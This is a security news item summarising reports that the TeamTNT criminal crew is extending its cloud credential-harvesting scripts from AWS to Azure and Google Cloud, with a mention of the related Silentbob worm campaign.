Security News > 2023 > July > Infosec watchers: TeamTNT crew may blast holes in Azure, Google Cloud users
A criminal crew with a history of deploying malware to harvest credentials from Amazon Web Services accounts may expand its attention to organizations using Microsoft Azure and Google Cloud Platform.
The crooks used to target primarily AWS users, and now seem to be looking for ways into Azure and Google Cloud accounts.
According a write-up last year from Elastic Security Labs, 33 percent of cyberattacks in the cloud use stolen credentials, something TeamTNT is known for.
Those updates have brought in support for obtaining Azure and Google Cloud credentials, made the scripts more modular to achieve more complex attacks, improved the credential harvesting, and brought in the curl command-line tool to exfiltrate data.
The work SentinelLabs and Permiso echoes what Aqua uncovered earlier this month in connection with a "Potentially massive campaign against cloud native environments" that researchers Ofek Itach and Assaf Morag laid at the feet of TeamTNT or a group using the same techniques.
They described the Silentbob campaign as an "Aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware, cloud credentials hijack, resource hijack and further infestation of the worm."
News URL
https://go.theregister.com/feed/www.theregister.com/2023/07/15/teamtnt_aws_azure_google/
Related news
- Google Cloud to make MFA mandatory by the end of 2025 (source)
- Google Cloud to Enforce Multi-Factor Authentication by 2025 for All Users (source)
- All Google Cloud users will have to enable MFA by 2025 (source)
- Google Cloud Cybersecurity Forecast 2025: AI, geopolitics, and cybercrime take centre stage (source)